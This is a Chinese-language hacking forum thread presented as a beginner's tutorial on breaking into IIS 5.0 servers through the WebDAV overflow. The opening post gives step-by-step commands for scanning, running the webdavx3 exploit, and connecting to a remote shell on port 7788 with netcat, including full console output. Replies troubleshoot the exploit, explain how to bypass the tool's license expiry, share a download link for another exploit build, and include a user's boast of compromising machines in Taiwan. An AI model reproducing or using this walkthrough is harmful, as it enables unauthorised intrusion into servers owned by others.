|
 | 作者: BearKing [bking]
 版主 |
登录 |
| 先用 WebdavScan 扫描一下,如果发现: 192.168.0.1 Microsoft-IIS/5.0 Enable 表示这个服务器存在Webdav漏洞。接下来就: C:\>ping 192.168.0.1 /*如果对方没装防火墙,那你80%会成功*/ C:\> webdavx3 192.168.0.1 IIS WebDAV overflow remote exploit by isno@xfocus.org start to try offset, if STOP a long time, you can press ^C and telnet 192.168.0.1 7788 try offset: 0 try offset: 1 try offset: 2 try offset: 3 try offset: 4 try offset: 5 try offset: 6 try offset: 7 try offset: 8 try offset: 9 try offset: 10 waiting for iis restart....................... (IIS在这里重起了,等一会) try offset: 11 waiting for iis restart....................... (IIS在这里重起了,等一会) try offset: 12 (程序运行到这里停顿下来了,如果停顿时间比较长都没有反应,就按Ctrl+C,然后连上目标的7788端口去) ^C C:\> nc -vv 192.168.0.1 7788 192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [192.168.0.1] 7788 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> /*OK,成功获得了一个shell*/ [此贴被 BearKing(bking) 在 05月07日11时59分 编辑过] [此贴被 BearKing(bking) 在 05月23日17时58分 编辑过] |
| 地主 发表时间: 05/03 08:39 |
 | 回复: cwenqiang [cwenqiang]  论坛用户 |
登录 |
|
nc -vv这里的vv是什么意思? |
| B1层 发表时间: 05/03 08:56 |
| 回复: BearKing [bking] 版主 |
登录 |
|
-v 详细输出――用两个-v可得到更详细的内容 |
| B2层 发表时间: 05/03 09:06 |
 | 回复: ycjzg [ycjzg]  论坛用户 |
登录 |
|
你的方法在XP上行的通吗?IIS5。1 |
| B3层 发表时间: 05/03 09:24 |
| 回复: BearKing [bking] 版主 |
登录 |
|
你去试试不就得了!方法都已经告诉你们了,行不行还得看你自己. [此贴被 BearKing(bking) 在 05月03日09时17分 编辑过] |
| B4层 发表时间: 05/03 09:29 |
 | 回复: cmpfix [cmpfix]  论坛用户 |
登录 |
|
请问出现这种情况是什么原因? This application has been generated with an evaluation license of the PerlApp utility. The evaluation license has expired now. Please contact the author of this application for a non-expiring version of the program: yan xue <isno@hacker.com.cn>. |
| B5层 发表时间: 05/03 10:15 |
| 回复: heiyeluren [heiyeluren]  论坛用户 |
登录 |
|
再5.1下是可以行的通的,因为WEBDAV漏洞中已经说明了它影响打了SP3的win2K和iis5.1 |
| B6层 发表时间: 05/03 10:19 |
| 回复: BearKing [bking] 版主 |
登录 |
|
那是webdavx3过期了,你把系统时间设为2002.12就可以用了 [此贴被 BearKing(bking) 在 05月03日10时45分 编辑过] |
| B7层 发表时间: 05/03 10:35 |
 | 回复: i1u [i1u] 论坛用户 |
登录 |
|
对啊 我也是出现一段英文,不行啊 是为什么啊?! |
| B8层 发表时间: 05/03 10:46 |
| 回复: BearKing [bking] 版主 |
登录 |
|
那是webdavx3过期了,你把系统时间设为2002.12就可以用了 |
| B9层 发表时间: 05/03 11:55 |
 | 回复: aa11 [aa11]  论坛用户 |
登录 |
|
我有个朋友还搞了个繁体的溢出工具~ |
| B10层 发表时间: 05/03 14:13 |
| 回复: BearKing [bking] 版主 |
登录 |
|
你有吗?发给我好吗? |
| B11层 发表时间: 05/03 14:19 |
 | 回复: lukaifeng [lukaifeng] 论坛用户 |
登录 |
|
NC是个什么东西,是不是一个木马? |
| B12层 发表时间: 05/03 14:49 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
我肯定有啦` 不过我没太出溢出~ 溢出了几台台湾的~ 呵呵~ 意大利的我就没去搞了` 我那个朋友全世界跑~ 不知道他下哪的~ 具说是国外站点的~ 我鹰文~~~~~~~~~ 5555555555555~ |
| B13层 发表时间: 05/05 07:53 |
 | 回复: qinsheng [qinsheng] 论坛用户 |
登录 |
|
妈的 我这里怎么出了第一行的 try offset:0 就没反应了。是不是因为我用小猫上太慢了? |
| B14层 发表时间: 05/05 23:02 |
| 回复: fangua [fangua] 论坛用户 |
登录 |
|
我试过几个有此漏洞的,怎么就不会停下来的,有什么绝招吗~ |
| B15层 发表时间: 05/06 12:47 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
你管它停不停, 另开个窗口, telnet ip 7788 上去了就成~ 没上去再试~ |
| B16层 发表时间: 05/06 13:25 |
| 回复: aa11 [aa11] 论坛用户 |
登录 |
|
繁体版~~ http://61.132.55.71:9995/down/show.asp?id=3427 |
| B17层 发表时间: 05/06 13:37 |
| 回复: marnudt [marnudt] 论坛用户 |
登录 |
|
这种方法好象不是很好用,成功率也不是很高 |
| B18层 发表时间: 05/06 16:21 |
 | 回复: drckness [drckness] 论坛用户 |
登录 |
|
E:\hacktools\WebDavKit\WebDavKit\Exploit>nc -vv 444.444.444.444 7788 : inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [63.99.209.120] 7788 (?): connection refused sent 0, rcvd 0: NOTSOCK 我拷总是不能成攻晕 |
| B19层 发表时间: 05/06 16:52 |
| 回复: nothing [eson] 论坛用户 |
登录 |
|
i succeed too. |
| B20层 发表时间: 05/06 17:54 |
 | 回复: best_lu [best_lu] 论坛用户 |
登录 |
|
各位老大,如果主机有防火墙如何应付?现在很少服务器没有防火墙. |
| B21层 发表时间: 05/07 08:49 |
 | 回复: linfish1 [linfish1] 论坛用户 |
登录 |
|
webdavx3 在哪下啊 怎么都是原代码啊 怎么用 |
| B22层 发表时间: 05/07 09:32 |
| 回复: leisure [leisure] 论坛用户 |
登录 |
|
是啊,知道了源代码怎么弄啊,是在c++里吗?往哪里填啊? |
| B23层 发表时间: 05/07 10:26 |
 | 回复: xccom [xccom] 论坛用户 |
登录 |
|
我用那个BIG5 IP得到提示 .... Couldn't connect: IO::Socket::INET: connect: Unknown error! 针对好几个2000server的服务都是这样的...我应该接着怎么做? |
| B24层 发表时间: 05/07 11:10 |
 | 回复: easyfly [easyfly] 论坛用户 |
登录 |
|
请问对英文版win2000能不能成功 |
| B25层 发表时间: 05/09 20:26 |
 | 回复: baby [sexfantasy] 论坛用户 |
登录 |
|
请问NC在哪里有下载啊? |
| B26层 发表时间: 05/10 04:23 |
 | 回复: vishx [vishx] 论坛用户 |
登录 |
|
黑客防线上有嘛 |
| B27层 发表时间: 05/10 09:26 |
 | 回复: feile [feile] 论坛用户 |
登录 |
|
好像对XP无郊 |
| B28层 发表时间: 05/11 10:12 |
| 回复: iqst [iqst] 论坛用户 |
登录 |
|
1 教程写的不敢恭维 2 只对win2000有效,nt,xp不行 3 iis若未重起,溢出就不成功 |
| B29层 发表时间: 08/03 20:41 |
 | 回复: yyf0322 [yyf0322] 论坛用户 |
登录 |
|
我觉得好象也是! |
| B30层 发表时间: 08/03 21:00 |
 | 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
扫3389 再溢出 得肉 |
| B31层 发表时间: 08/03 22:18 |
| 回复: hacker521 [hacker521]  论坛用户 |
登录 |
|
哈哈,BearKing ,这篇不就是俺提交的帖子吗,我还以为被老大枪毙了,怎么给你帖出来了 |
| B32层 发表时间: 08/04 08:50 |
| 回复: ddy328 [ddy328] 论坛用户 |
登录 |
|
WebDAVScan 这个软件不回用怎么办?我是个菜鸟。 |
| B33层 发表时间: 08/04 16:13 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 想成为黑客的菜鸟先到这来看看(基础篇:利用Webdav漏洞入侵)